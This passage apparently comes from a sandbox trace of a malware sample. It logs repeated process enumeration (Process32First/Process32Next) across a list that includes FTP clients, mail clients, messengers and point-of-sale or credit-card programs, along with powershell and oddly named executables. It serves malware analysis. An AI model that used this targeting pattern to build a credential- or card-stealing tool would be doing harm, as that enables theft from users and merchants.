th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="far.exe")) returned 1 [0261.534] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="filezilla.exe")) returned 1 [0261.539] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="flashfxp.exe")) returned 1 [0261.541] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="foxmailincmail.exe")) returned 1 [0261.543] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="fling.exe")) returned 1 [0261.545] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="gmailnotifierpro.exe")) returned 1 [0261.547] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="icq.exe")) returned 1 [0261.549] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="leechftp.exe")) returned 1 [0261.551] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1118, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="ncftp.exe")) returned 1 [0261.553] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="notepad.exe")) returned 1 [0261.555] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x112c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="operamail.exe")) returned 1 [0261.557] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1134, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="outlook.exe")) returned 1 [0261.587] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x113c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="pidgin.exe")) returned 1 [0261.589] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="scriptftp.exe")) returned 1 [0261.591] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x114c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="skype.exe")) returned 1 [0261.593] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1154, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="smartftp.exe")) returned 1 [0261.596] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x115c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="thunderbird.exe")) returned 1 [0261.597] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1164, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="trillian.exe")) returned 1 [0261.603] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x116c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="webdrive.exe")) returned 1 [0261.605] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1174, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="whatsapp.exe")) returned 1 [0261.607] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x117c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="winscp.exe")) returned 1 [0261.609] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="yahoomessenger.exe")) returned 1 [0261.610] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x118c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="accupos.exe")) returned 1 [0261.612] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1194, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="afr38.exe")) returned 1 [0261.614] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x119c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="aldelo.exe")) returned 1 [0261.616] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="ccv_server.exe")) returned 1 [0261.618] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="centralcreditcard.exe")) returned 1 [0261.619] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="creditservice.exe")) returned 1 [0261.621] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="edcsvr.exe")) returned 1 [0261.623] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="fpos.exe")) returned 1 [0261.628] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="isspos.exe")) returned 1 [0261.665] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="mxslipstream.exe")) returned 1 [0261.668] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="omnipos.exe")) returned 1 [0261.669] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="spcwin.exe")) returned 1 [0261.671] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="spgagentservice.exe")) returned 1 [0261.673] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="utg2.exe")) returned 1 [0261.674] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1234, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="active-charge.exe")) returned 1 [0261.676] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1244, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="society-position-myself.exe")) returned 1 [0261.677] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x124c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="heavy.exe")) returned 1 [0261.679] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="mayvarious.exe")) returned 1 [0261.681] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1338, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0261.682] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1394, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0xa1c, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0261.684] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x60, pcPriClassBase=6, dwFlags=0x0, szExeFile="msfeedssync.exe")) returned 1 [0261.686] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0261.687] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc2c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x37c, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0261.689] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="9DC0.exe")) returned 1 [0261.691] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x778, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x6d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0261.692] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x610, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x60, pcPriClassBase=6, dwFlags=0x0, szExeFile="bcatcih")) returned 1 [0261.694] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd0c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0261.696] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x6d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="powershell.exe")) returned 1 [0261.697] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x10b0, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0261.699] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x10b0, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 0 [0261.741] CloseHandle (hObject=0x2338) returned 1 [0261.741] Sleep (dwMilliseconds=0x64) [0261.776] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2338 [0261.787] Process32First (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0261.789] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x71, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0261.790] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x130, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0261.795] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0261.797] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0261.798] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0261.800] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x200, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0261.801] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x218, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0261.803] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x220, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0261.804] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x278, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2c, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0261.806] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0261.807] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x32c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x200, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0261.809] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x360, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0261.811] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x37c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0261.812] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x38c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0261.814] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0261.844] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x22, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0261.846] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4d, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0261.847] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x468, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0261.849] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0261.850] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x568, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0261.852] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x640, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x34, th32ParentProcessID=0x620, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0261.853] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x674, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0261.860] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0261.861] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0261.862] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x558, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0261.864] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x824, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x21, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="SkypeHost.exe")) returned 1 [0261.866] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x884, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1 [0261.867] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x8f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0261.869] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa74, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0261.871] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 